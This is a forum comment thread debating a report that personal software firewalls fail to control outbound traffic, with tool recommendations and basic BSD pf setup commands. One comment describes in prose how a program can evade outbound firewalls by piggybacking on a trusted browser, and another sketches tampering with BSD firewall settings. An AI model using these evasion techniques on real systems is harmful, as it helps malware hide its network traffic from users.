Personal Firewalls Mostly Useless, Says Mail & Guardian

hweimer writes "More and more security researchs come to the conclusion that personal firewalls are ineffective in controlling outbound traffic. An article in the Mail & Guardian online mentions a test that 'showed that the software often causes more problems than it solves. Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.' Simple PoCs are available, too."

misleading headline

[macadamia_harold]

More and more security researchs come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.

Re:misleading headline

[iMaple]

Yes, I agree. The title should say " Personal (software) Firewalls Mostly Useless (for out bound traffic)". And that is unpreventable if the user is always logged in as an admin and runs malicious executables (or programs with known security issues, like older versions of browsers). This would be an issue, if a non-admin user could disable the firewall (which I guess is not easy, since the article does not mention that). So there is no real problem with the personal firewall software.

The firewalls are still very useful in preventing attacks due to OS vulnerabilities (like the Windows RPC issues). Anyway that is the main aim of personal firewalls, and the article does not have anything about the effectiveness of the firewall for inbound traffic.

If you want a secure outbound firewall the best bet is to use a dedicated gateway machine with the firewall (I use my very old laptop with BSD on it as a gateway)

Re:misleading headline

[marrandy]

Talk about stating the obvious...this is the most useless article I have read in a long time.

1) Web browser and javascript bugs - nothing to do with hardware or software firewalls.

2) email issues, people going to bad sites etc. - nothing to do with hardware or software firewalls.

3) People should not run as administrator (or root) - wow, really.

4) People should stay up-to-date on patches - wow, totally amazingly obvious.

As you can't control people, they will always do these things. Good software firewalls show-up issues after they have made these mistakes, when rogue software tries to get out.

They also failed (or I missed it) to mention that software firewalls are good when you have multiple computers behind a hardware firewall - basically and infected computer will be blocked infecting other computers e.g. netbios etc.

Good computer security is a layered concept. From incoming hardware firewalls, IDS, software firewalls on individual computers, user training, security audits etc. I wish people and organizations writing articles would finally learn this. There is no 'magic' one solution.

Re:misleading headline

[bytesex]

Software firewalls on the machine itself can do something hardware firewalls can't; it can check to see that the outbound traffic is coming from a trusted application running as an actually logged on user. Without this option, a firewall must assume that all traffic with a destination port 80 or 443 (or 25 or whatever) will be legit, allowing all sorts of malware to pretend to browse while doing their actual nasty stuff. On windows, a firewall could even check whether the app in question has a window open, which creates an extra check (this visible application is making network connections).

Re:misleading headline

[Just+Some+Guy]

Yes, I agree. The title should say " Personal (software) Firewalls Mostly Useless (for out bound traffic)".

Actually, you to end with forgot ", On Windows". As you probably already know, you can set a BSD system's "securelevel" such that firewall rules, both in kernel and on disk, can't be altered without a reboot. You could hypothetically write a program that patches a BSD machine's boot sequence with one that unprotects the firewall configuration, alters it, changes the backup file so that the user won't get an email notification later on that details the differences, then resumes normal operation - all while hoping that the user or administrator doesn't notice the spontaneous reboot - but there aren't too many of those running around today.

Re:misleading headline

[Pieroxy]

I use my very old laptop with BSD on it as a gateway
For a few bucks, you could buy a small linksys dedicated box. That box - in addition of doing the job fine - pumps up less power than a laptop will ever do even in their lowest consumption settings. In a few month, the cost of the Linksys box will be recouped on the electric bill. And it is smaller and heats up less.

My view on the problem at least.

Re:misleading headline

[value_added]

Can you help someone out by pointing me towards a link to a good site that show's how to set something like that up? I've got a bit of experience with linux and solaris, but mostly use windows. I don't have any experience using BSD ...

I'll offer a suggestion. Install FreeBSD on any old computer with two NICs. You'll find the installation as easy as any Linux system, the routine maintenance probably easier, and the documentation far superiour.

Sit down to read the pf FAQ on OpenBSD's site. It's well written and comprehensive so read from the first page to the last page. Make some coffee and then read it again.

# cd /usr/ports/shells/bash && make install
# echo 'pf_enable="YES"' >> /etc/rc.conf
# echo 'pf_rules="/etc/pf.conf"' >> etc/rc.conf

Edit /etc/pf.conf using the home user scenario provided at the end of the 'pf FAQ'. Reboot and you're good to go.

You'll find pf far less verbose than iptables, ipfw, etc., and easier to learn and to use for that reason among others. There's also lots of additional tools available for pf that will help as well.

$ cd /usr/ports && make search name=pf | less

Google for all the rest.

A final comment. Using this approach gives you a secure firewall with all the unixy goodness you'd expect, not to mention logging, SSH, NTP synchronisation, etc that you may want to use as well. And earning the right to sneer at everyone using those plastic Linksys NAT boxes doesn't hurt.

Re:misleading headline

[dgatwood]

It also makes dynamic loading and unloading of device drivers impossible, which is why it doesn't make any sense for desktop system. Security can only be achieved through properly granting permission, not through outright avoiding granting permission. A scheme that is too restrictive will simply get turned off or worked around by the end users, and thus is not particularly useful, and indeed may actually be harmful to security because of developers making security assumptions that are no longer valid in such a situation.

Want to really improve security? Create multiple separate privilege sets in the kernel instead of a single "root". Make different executables setuid to a user with privilege sets that allow certain operations. Your kernel extension loader has sufficient privileges to load a kernel extension, but still can't write directly to kernel memory or listen on low numbered ports or access raw devices or bypass filesystem permissions. Your software that requires the ability to listen on low numbered ports doesn't get permission to bypass filesystem permissions or load kernel extensions. And so on.

Don't get me wrong, it's perfectly okay to have a "root" user, but no executable should ever be setuid root in such a scheme, and that root user should only be used for very limited administrative tasks.

Told you so

[growse]

Well, that's what happens when you try and introduce a complex topic like network security into the consumer market, and subsequently fail at that task. They (the software manufacturers) fail not only in raising a suitable amount of awareness (if every single computer on the planet was behind a firewall, how many worms/malware would this stop?), but they also fail to do the job properly (not blocking outbound traffic) for those who do install their software.

Re:Told you so

[lightyear4]

Unfortunately, they also create a false sense of security. In my opinion, that is far, far worse.

"Why home firewall software is a leaky dyke"

As a lesbian, I must protest to this offensive and disparaging comment.

Outbound Traffic?

[parasonic]

Yes, they may be ineffective in controlling outbound traffic. However, that's not the real point of a personal firewall.

Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories." I'll never forget the day that I left open an unpatched WinXP box after a fresh install. I watched all of the script kiddies and automated worms go at it from my passive OpenBSD monitoring box. That machine was hacked in under ten minutes just because I left it there, open to the Internet. So, useless? No.

If it's in it's already too late

[El+Cubano]

Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.

First, nothing is perfect. Second, if some nasty program/spyware/adware got in, then it's too late already. The best thing is to prevent them getting in to begin with. Besides, most people don't know the difference between what should and should not be allowed to have access. I do some tech support for friends and family and it really gets annoying after the fifteenth call, "Should I let FooBar21.exe access to the Internet?" I finally went with the policy of disabling any sort of outbound filtering in whatever firewall I setup for people I will be "supporting."

Re:If it's in it's already too late

[voice_of_all_reason]

You could also advise them to simply google the .exe file. Every time I've tried this, the first 10 results have always been a group of sites that detail exactly what it's from and a recommendation to allow it or not. Give a man a fish/teach a man to fish and all.

Sure it takes more time, but the only real reason I even use a firewall is to keep winamp and media player from phoning home.

Annoyance

[damaki]

Personal firewalls do not block outbound connection because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some windows firewall that allows that? You get hundred of warnings from obscure services trying to send unknown data to somewhere you do not want to know. Users are clueless about it, they will just check the box that say "shut up and hack by box" if it prevents further messages from appearing.

Simple

[The+Cisco+Kid]

A firewall is a *device* between a device that needs 'protection' (usually a Windows PC), and an Internet connection. Keyword *device*, as in a seperate physical piece of equipment. A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. Eg, completely useless. 'Software Firewall' is an oxymoron.

Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based. The simplest is a simple one-way NAT (outbound connections allowed, inbound connections impossible without a specific, intentional mapping). These of course only protect against active outside attacks, and not against trojan/virus emails or websites visited from the PC. The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.

ZoneAlarm?

[CyberZCat]

Did they test zonealarm? Because even with my best efforts to circumvent it (for testing), it's still able to block everything. Even as an Admin user, it's not possible to stop the service unless you "officially" exit the program. I've been using it for years, and I haven't once ever had a program that it didn't block (if I chose to block it). Even test software which was spesifically meant to try to find holes in personal firewalls. The new version does other handy things too, like keeping an eye on software which tries to monitor your keyboard/mouse (such as keyloggers) and giving you the option to block them from doing that. Very handy.

Purpose of a personal firewall

The personal or desktop firewall is not supposed to be your first line of defense, it's supposed to be your last line of defense.

I recommend that people use both a hardware and software firewall, the hardware firewall protects you from the Internet in general. The software firewall protects you from the other computers on your local network.

But when it comes down to it, a firewall is as strong as it's weakest link, which is almost always the enduser. Running as admin while browsing, downloading software from untrusted sources, don't blame the firewall for user stupidity.

They just didn't have enough firewall.

[Colin+Smith]

Most of the "secured" computers I've seen have 3, 4 or more firewalls installed and "working". If one firewall isn't stopping outbound connections, go install another one, you'll be twice as secure then.

Little Snitch for Mac OS X

[toupsie]

Mac users don't think you are safe because you aren't running windows. It's amazing the number of Apps that "phone home". A great tool for Mac OS X egress filtering is Little Snitch. It's cheap and easy to use.

Bad article, no donut

[Chairboy]

The article makes a number of critical errors that impact its credibility.

The article expounds on the dangers of Javascript, but fails to mention ActiveX. I suspect the author had heard about "scripting" being a security hole and assumed incorrectly that the other person was talking about Javascript. JS is inconsequential compared to ActiveX when it comes to actual risk.

Additionally, when it claims that AV software essentially supersedes any firewall in terms of protection, it fails to consider the security nightmares in Windows. Specifically, through the trust relationships, you can modify registry settings and execute code on computers without your viral code ever touching the disk on the machine by doing it remotely from another computer. Because memory scanning is essentially ineffective, modern AV programs cannot effectively protect against this, which is why most security companies suggest combining AV with a Firewall. Plus, there are regular buffer overflow exploits that have the same effect: Code running without touching the disk. Where do they come from? Over the wire. Code Red and Nimda are good examples of attacks that were stopped by even the most basic firewalls. Safe browsing had no effect whatsoever on whether a user was infected.

Finally, the article fails to take into consideration the thought that goes into the automatic rule creation most firewalls come with now. Developers understand that users demand convenience and security, and work to find a good match of both. To this effect, most modern desktop firewalls will use signature based rules (so that a malicious program has to do more than just be named after a trusted program) to create a basic rule that allows that program outbound access. The ports are not being just "left open" willy nilly, they are connected to known programs and watched. Some firewall programs even watch for threadjacking malware that would inject itself directly into trusted programs, that gives even more protection.

The author of the article should reevaluate his or her knowledge of internet security. It is likely that the increasing ease of use has been interpreted as a drop in protection, but this is not the case. A secure system is one that uses a heterogeneous mix of disk and network protection.

Result of Fundamental Flaw

[JBHarris]

A fundamental concept in computing now-a-days is that software designers attempt to do as much thinking for the end user as possible. This is a generally good thing, as the easier/more-intuitive software is to use, the more people will use it. That point aside, this can be a negative thing as it keeps users from needing to understand what they are actually doing. Using computers NEEDS at least a basic understanding of what's going on.

I don't mean everyone should study the TCP/IP stack and fully grasp ports and such, but seriously....you can't just show someone what a car does & explain the controls and then expect them to be able to drive properly & safely. It takes training & study.

The same is true with computers. I'm not suggesting an 'internet license' or anything, but I would recommend that high school core classes at least provide the basics of the underlying fundamentals of computing. Until someone understands what those firewalls are for, they will never reach a truly useful state.

Brad

Question

[geeber]

So if I have a hardware firewall in my router is a software firewall useful as a last ditch defense? Or is it nothing more than an annoyance and resource hog?

Re:Question

[legoburner]

Although they do not provide much benefit, it can sometimes be worth it, especially if you have a wireless network behind your firewall. One rogue worm-ridden computer on your wireless network and bad things can happen to all your machines. Having a software firewall will be consume resources and might annoy you from time to time, but will reduce the chance of infection from common worms. You should never presume your internal network is secure unless you can completely verify every last bit that comes in to it.

Re:Question

[SCHecklerX]

Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things. For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

For a skilled user (which these aren't marketed to anyway), there is value in anlyzing what your software is trying to open outbound connections to, if you tell your PFW to alert you. In the hands of a skilled user, this is good information and the PFW is a good tool to analyze what software you may want to ditch or restrict. Again, this isn't the demographic most PFW vendors market to. You can't use a tool like this without a basic knowledge of how TCP/IP works. Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

Re:Question

[99BottlesOfBeerInMyF]

Software firewalls 'solve' the same problem as antivirus software. They attempt to disallow stupid users from doing stupid things.

I disagree. Software firewalls on Windows attempt (and usually fail) to add granularity of control for end users.

For the most part, if people don't install unknown/untrusted software on their PCs, and use safer alternatives for online stuff (gaim, firefox, sylpheed vs. aol's own messenger, MSIE, Outlook) along with practicing safe online computing in general, personal firewalls add the same value as antivirus software. None.

This depends a whole lot upon your definition of "trusted." In any case, this is just another example of tools being designed without taking users into account. For most users the point of a computer is to run software they want. They don't know what software is secure and I'd argue no one does as everyone has to trust others. I don't know if Firefox has a backdoor that will be enabled next week. I haven't audited all the code. I doubt you have either. Whether it is Firefox, some shareware, an executable some friend sent via IM, of just something the user thought was data but the extension was hidden on, users who don't run untrusted data are missing a huge portion of the functionality they want from their computer. More important yet, they expect that functionality. It is not that they are stupid, they just have reasonable expectations that are not being met.

For example, most users never want any programs except their e-mail client to be able to read their e-mail address book. I mean what kind of stupid machine would let "nekkid_pics.jpg(.exe)" read my friends e-mail addresses and send a whole bunch of e-mail to them without asking me first? Who wants their computer to do that? And yet, almost all modern OS's just let any old program or program disguised as data to absolutely anything they want without asking the user or even informing them. That is what is stupid.

Then again, maybe that should be required knowledge for any user who connects their computer to the Internet. We need licenses to show we are competent enough to drive cars, and this is the "Information Superhighway" after all.

If I drive poorly, a bunch of kids could get run down and killed by a ton of metal. If I run random executables someone might get spam e-mail. Perhaps you see how the negative consequences of the former warrant licensing while the latter almost certainly does not?

The real problems are twofold. One, computers are very poorly designed and don't behave as users expect. Two, when computers don't meet people's fairly reasonable expectations and instead are hijacked by spammers, people like you blame the users instead of the crappy OS's. Fix the software first, then if the problem persists you can blame the users.

Which Six?

[140Mandak262Jamuna]

Could not find the list of the six software tested. Dont know if Zone Alarm was tested and found to be defective too. But I would be surprised. Everytime I update FireFox, Zone Alarm knows that the exe file has changed and alerts me to renew permission for it to connect to the internet.

No kidding... I've found them useless in practice

[RebornData]

The issue with most desktop software firewalls that attempt to control outbound connections is that they have no idea in advance what constitutes a valid program and what doesn't. So they ask the user, who in most cases is unable to answer the question. The only information typically provided is the executable name, and in many cases it's a generic one (like svchost.exe) that leaves even an experienced user without the ability to make an informed decision.

The problem is that this trains users to ignore the prompts and habitually click "allow" or "deny" (usually because they find out the hard way that stuff breaks when they click "deny"). The result is far worse than if there were no attempts to control outbound access, because most of these firewalls (Zonealarm in particular) use similar techniques for *inbound* traffic too... they will prompt the user when a program opens a listening port, and if they hit "allow" will enable global inbound traffic to that port, creating a hole that otherwise wouldn't have been there.

This happens regularly in practice- I've seen it over and over again with my small business consulting clients. Although technically an outbound software firewall with program control could be a good last-ditch effort to block malware that has managed to get installed and running, on a practical basis they cause more problems than they solve.

-R

ZoneAlarm + broadband router = happiness

[WidescreenFreak]

Even though I'm behind a firewall, I use ZoneAlarm on all of my PCs so that I can catch what's communicating with the Internet and what's not. So far, it's done superbly well as far as I can tell.

For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's fnished! Excuse me? Exactly what is Media Player trying to figure out? Well, whatever it is, it's none of their damned business. Check "Remember this setting", click "Deny", and done.

Every time a process tries to act like a server, ZA also notifies me of that as well. It's a bit of a pain when I fire up a game server for the first time and the pop-up balloon interferes with the screen (whoops), but again it just shows that it's at least doing what it's supposed to do.

ZoneAlarm has its share of issues, but it clearly goes with the attitude of "better safe than sorry". There have been some rare times where the program itself doesn't start, for whatever reason, but its service gets started. On those rare occasions I've noticed that the service, if it can't communicate with the control daemon, or whatever you want to call it, it just blocks all network access. It could have just allowed everything instead and there'd be no way of knowing if it's working or not. Personally, I'd rather have it block all access. Not only does that let me know that there's a problem, but it's certainly keeping the PC's network connection secure.

Using a hardware firewall for inbound and ZA for outbound connections makes perfect sense as far as I'm concerned. It's not trouble-free, but they've been getting better at its stability over the past several revisions from what I can tell.

Re:Which software?

[Lambticc]

_G Data InternetSecurity 2006 _F-Secure Internet Security 2006
_Kaspersky Internet Security 6
_Trend Micro PC-Cillin 14 Internet Security
_Symantec Norton Internet Security 2006
_Zonelabs Zonealarm Internet Security 2006
_McAfee Internet Security Suite 2006
_Computer Associates eTrust Internet Security Suite r2
_Panda Platinum Internet Security 2006
_Softwin Bitdefender 9 Internet Security

This is all I could find from the german site PC Progressionell ..meine Deutshe ist nicht so gut.

[OT] Re:Link to "printable" version of stories!

[Ma�djeurtam]

If slashdot, digg and friends were to link to printable versions, how long would it take for those sites either to remove the print version or to put their ads there?

Winpooch

[jhfry]

This is why I run winpooch http://winpooch.free.fr/. It's not a firewall, but it does allow me to monitor my outgoing connections, and apply rules to them. For example, I can have it prompt me for every outbound, just announce when an outbound connection is established, or allow all outbound. Same thing with inbound. More complex rule sets are allowed as well.

It's not gonna save me from a worm itself, but it will tell me when I have a worm or rootkit making outbound connections.

And it allows me to use ClamWin to do on access scanning, tells me whenever an application tries to change the registry or system files, and provides a simple method to determine most of the potentially damaging processes running on my machine.

Best of all it's opensource.

A firewall is a *device*

[Curmudgeonlyoldbloke]

And where do you insert this "device" between your PC and the wireless router in the coffee shop or hotel romm in which you're sitting? Wave it around in mid-air or something?

Besides that, the most useful purpose of these things isn't against trojans that someone's running because they're an idiot, it's software such as media players insisting on phoning home (for example, the "Microsoft Windows Media Configuration Utility" connection attempt that occurs when WM9 tries to update itself).

Biggest problem with personal firewalls

[totallygeek]

Okay, we are talking about Windows users: they will simply click 'Yes' to anything that pops up on the screen.

Better than nothing

[embracethenerdwithin]

I never assumed my software firewall was some amazing thing that kept me 100% safe. But I would still never want to surf without one. I don't care if it only protects against some attacks, it's definately better than none. I would rather be protected from a little than nothing.

My view has always been using a combination of things that help is th ebest idea. Using a router that has a hardware firewall + a software firewall + antivirue + a secure browser(firefox) is a decent way to keep safe. This won't stop everything, but it's better than surfing around with no protection. Also add not doing stupid things to that equation for maximum protection.

Trivial to Bypass

[ThinkFr33ly]

I always get a kick out of people who set their firewall to prompt on every attempt to access the net, especially when they're running as admin on their boxes.

Even without the user running as admin, it's fairly easy to create a program to bypass outgoing firewalls. Basically the trick is it piggypack your communications over an existing application that's trusted.

Nearly everybody is going to trust IE (or Firefox, or whatever browser) to access the network. All you have to do is figure out a way to use that program to do your communications for you.

I once wrote a proof of concept app (in VB no less!) that used IE to do exactly this. I setup a simple piece of server software that accepted requests via HTTP GETs and returned the response as base64 encoded text in an HTML body. When my app needed to access remote data I just used IE to request that data from the server and then base64 decoded it. I could have also done something like have the server software act as a proxy so I could request any remote data I wanted, even if it wasn't hosted by my server. It was trivial.

The best part was that *every* major outgoing firewall failed to detect this attempt, despite that fact they claim to be able to tell when one application is using another to piggyback communications. Perhaps it was the way the COM interface worked, I'm not sure... but it never failed and never prompted me to allow it to happen.

Re:IP Tables

[mpapet]

Linux has IP Tables which is very good for the job. Is it as good as BSD? I would argue less time consuming if you already run Linux, but it's not the same.

Notes: I believe for stateful packet inspection, the kernel needs ip_conntrack and a few other things in it. Most distro kernels have this but it's worth double checking. From there, it's learning the IP tables syntax which isn't hard after going through one of the many examples out there. Once you get logging going, check out intrusion prevention systems!

http://www.google.com/search?hs=3PG&hl=en&lr=&clie nt=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q= iptables&btnG=Search

BSD firewall tutorial (was Re:misleading headline)

[badger.foo]

The manuscript at http://www.bgnett.no/~peter/pf/ is for a half day tutorial in setting up OpenBSD's PF firewall (also available on FreeBSD, NetBSD and DragonFlyBSD).

The response I get (yes, I'm the guy who wrote the tutorial) is that people find it quite useful.

The fact that it includes a few tips on how to give spammers a hard time helps too I guess.

ISP's hate firewalls

[phorm]

I love how, whenever I go to my grandparents to fix their computer (after they've dealt with their ISP's tech support) the ethernet cable is always running straight to the PC and bypassing the router. It's hard enough to get average Joe to understand the usefulness of a hardware routing/firewall device, but when the ISP is actively having them bypass it I can see a software firewall being somewhat useful at times.